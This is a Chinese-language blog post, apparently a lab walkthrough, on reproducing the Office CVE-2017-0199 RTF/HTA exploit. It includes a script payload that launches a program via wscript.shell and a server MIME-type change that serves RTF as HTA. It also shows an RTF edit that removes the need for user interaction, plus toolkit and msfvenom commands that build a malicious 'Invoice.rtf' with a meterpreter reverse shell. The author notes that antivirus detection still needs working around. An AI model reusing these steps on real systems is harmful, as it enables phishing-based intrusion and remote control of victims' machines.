Office CVE-2017-0199复现

介绍


本文介绍在Ubuntu 14.04服务器版本下复现office cve-2017-0199。

环境

ubuntu 14.04服务器版

目录

1、验证

 Step 1:安装apache2服务



 Step 2:在网站根目录下创建1.rtf,内容如下:

1
2
3
4
test789 
<script>
var objShell = new ActiveXObject("wscript.shell"); objShell.Run("%SystemRoot%\\system32\\calc.exe");
</script>

 Step 3:验证apache的配置文件mime.types里有rtf的content type项
因为mime.types的位置可能因系统而不同,所以直接使用find命令查找位置



 查看该文件,可以看到



 Step 4:使用office 2013 pro 创建空白文档,然后点击“插入”  “对象”,
在文件名上填写完整的网页地址,选择链接到文件



 点击“确定”,然后在文档中可以看到 test789。



 注:在此步中,很可能不成功,具体原因未知。
具体现象:在链接到1.rtf时显示找到路径,不存在该文件。但去链接同目录下的index.html文件时可以成功,成因未知。

 Step 5:将mime.types中的application/rtf rtf 改成 application/hta rtf
重启apache服务





 Step 6:双击对象







 可见成功利用CVE-2017-0199漏洞


2、取消交互

 为了取消用户交互,也就是让用户去双击
 Step 1:将文件另存为.rtf格式



。。。。。直接被卡巴检测到恶意文件.



 Step 2:用文本编辑器打开刚才保存的rtf格式文件,找到object标签所在地方



 把{object\objautlink\rsltpict 改成 {object\objautlink\objupdate\rsltpict

 保存文件再打开,这样就不用用户交互了。

 此时在虚拟机中新建一个空白文档,这时,在点击链接到文件后已经会自动弹出计算器了
虚拟机环境:win7,office 2010 pro








———-

### 3、Get Shell
 在kali中利用exploit
 Github地址:https://github.com/bhdresh/CVE-2017-0199

下载后,在情景1下实验

1
2
3
4
5
6
7
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe


按以上命令依次运行




 可证实该exploit可行。
 但生成的.rtf在执行时会被杀软报毒,需要解决。

# CVE, office

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×